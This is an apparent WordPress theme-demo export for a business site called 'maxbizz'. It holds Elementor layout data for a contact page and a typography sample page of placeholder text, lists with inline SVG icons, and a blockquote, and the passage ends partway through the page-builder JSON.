		<wp:meta_value><![CDATA[[{"id":"86d48d0","elType":"section","settings":{"gap":"extended","structure":"21","padding":{"unit":"px","top":"116","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"1feabce","elType":"column","settings":{"_column_size":33,"_inline_size":43,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"030e332","elType":"widget","settings":{"sub":"contact details","title":"Our Contacts","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"header_size":"h3","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"588e854","elType":"widget","settings":{"editor":"Give us a call or drop by anytime, we endeavour to answer all enquiries within 24 hours on business days. We will be happy to answer your questions.","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"130afd7","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title":"Visit Us Daily","header_size":"h6","des":"411 University St, Seattle, USA","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":27,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#D923001A","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"8ab1650","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title":"Call Us 24\/7","header_size":"h6","des":"+1-800-456-478-23","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":22,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#D923001A","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"f3cf3dd","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title":"Mail Us","header_size":"h6","des":"maxbizz@mail.com","link":{"url":"mailto: maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":24,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#D923001A","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600"},"elements":[],"widgetType":"iiconbox2"}],"isInner":false},{"id":"89ca7e2","elType":"column","settings":{"_column_size":66,"_inline_size":56.66499999999999914734871708787977695465087890625,"_inline_size_tablet":100},"elements":[{"id":"4fb28a7","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image-contacts.png","id":465},"image_size":"full","_margin":{"unit":"px","top":"-46","right":"-120","bottom":"0","left":"-70","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a5be57a","elType":"section","settings":{"margin":{"unit":"px","top":"-245","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-100","right":0,"bottom":"0","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"-10","right":0,"bottom":"50","left":0,"isLinked":false},"z_index":1},"elements":[{"id":"574fa46","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"12e32dc","elType":"widget","settings":{"cf7":"1319","_padding":{"unit":"px","top":"60","right":"60","bottom":"60","left":"60","isLinked":true},"_padding_mobile":{"unit":"px","top":"50","right":"20","bottom":"50","left":"20","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"ictf7"}],"isInner":false}],"isInner":false},{"id":"de4c36a","elType":"section","settings":{"layout":"full_width","margin":{"unit":"px","top":"-60","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false}},"elements":[{"id":"f31c287","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3e66202","elType":"widget","settings":{"address":"411 University St, Seattle, USA","height":{"unit":"px","size":520,"sizes":[]},"css_filters_css_filter":"custom","css_filters_saturate":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"google_maps"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2023]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:5:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:28:"stitle_typography_typography";i:1;s:27:"stitle_typography_font_size";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:3;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:9:"icon_font";i:3;s:5:"title";i:3;s:11:"header_size";i:3;s:3:"des";i:3;s:4:"link";i:3;}}s:5:"style";a:3:{s:17:"style_box_section";a:2:{s:7:"is_line";i:3;s:7:"icon_bg";i:3;}s:18:"style_icon_section";a:6:{s:10:"icon_space";i:3;s:9:"icon_size";i:3;s:13:"icon_bg_width";i:3;s:10:"radius_box";i:3;s:27:"icon_shadow_box_shadow_type";i:3;s:22:"icon_shadow_box_shadow";i:3;}s:21:"style_content_section";a:5:{s:15:"title_space_top";i:3;s:18:"title_space_bottom";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:1;s:13:"margin_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:1;s:10:"image_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:3:"gap";i:1;s:6:"layout";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:6:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;s:6:"margin";i:2;s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;s:7:"z_index";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:3:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}s:19:"_section_background";a:2:{s:22:"_background_background";i:1;s:17:"_background_color";i:1;}s:15:"_section_border";a:3:{s:14:"_border_radius";i:1;s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}s:11:"google_maps";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:11:"section_map";a:2:{s:7:"address";i:1;s:6:"height";i:1;}}s:5:"style";a:1:{s:17:"section_map_style";a:2:{s:22:"css_filters_css_filter";i:1;s:20:"css_filters_saturate";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Typography</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/typography/</link>
		<pubDate>Mon, 07 Sep 2020 04:22:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=471</guid>
		<description></description>
		<content:encoded><![CDATA[<h1>Heading 1</h1>
Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.
<h2>Heading 2</h2>
Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.
<h3>Heading 3</h3>
Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.
<h4>Heading 4</h4>
Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.
<h5>Heading 5</h5>
Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.
<h6>Heading 6</h6>
Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.
<h4>IV Columns</h4>
A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.

A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.

A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.

A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.
<h4>III Columns</h4>
Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.

Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.

Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.
<h4>II Columns</h4>
Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.

Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.
<h4>Text Elements</h4>
Three of these curves describe an initial Covid-related spike in demand, and three describe a short-term hit. Where each group begins to diverge, however, is in what’s likely to happen to demand over the next several years. Think, for example, of personal computer monitors or other types of goods that were declining pre-pandemic and fall into the “short-term spike, long-term decline” archetype. The story is different for online grocery shopping and collaboration services like Zoom (short-term spike, long-term growth), both of which were growing steadily before the pandemic. <em>Experimentation during the crisis has convinced more and more customers that ordering or meeting online makes sense, pulling forward demand that will likely stick</em>.
<h4>Highlights</h4>
Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.

Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.
<h4>Dropcaps</h4>
Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.

Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.
<h4>Listings</h4>
<ol>
 	<li>Customer Experience</li>
 	<li>New Business Innovation</li>
 	<li>Sales and Marketing</li>
</ol>
<ul>
 	<li>Customer Experience</li>
 	<li>New Business Innovation</li>
 	<li>Sales and Marketing</li>
</ul>
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g></g></svg>

<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Customer Experience</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g></g></svg>

<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

New Business Innovation</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g></g></svg>

<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Sales and Marketing</li>
</ul>
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Customer Experience</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

New Business Innovation</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Sales and Marketing</li>
</ul>
<h4>Blockquote</h4>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>471</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 04:22:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 04:22:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[typography]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.12]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8a5d04c","elType":"section","settings":{"padding":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"dc1cfdf","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3925b8d","elType":"widget","settings":{"title":"Heading 1","header_size":"h1","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9cdb2cf","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7594742","elType":"widget","settings":{"title":"Heading 2","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4f04e2d","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"552d935","elType":"widget","settings":{"title":"Heading 3","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"eb0c1c1","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7a7b273","elType":"widget","settings":{"title":"Heading 4","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3cce58e","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3d16c16","elType":"widget","settings":{"title":"Heading 5","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1782a00","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic 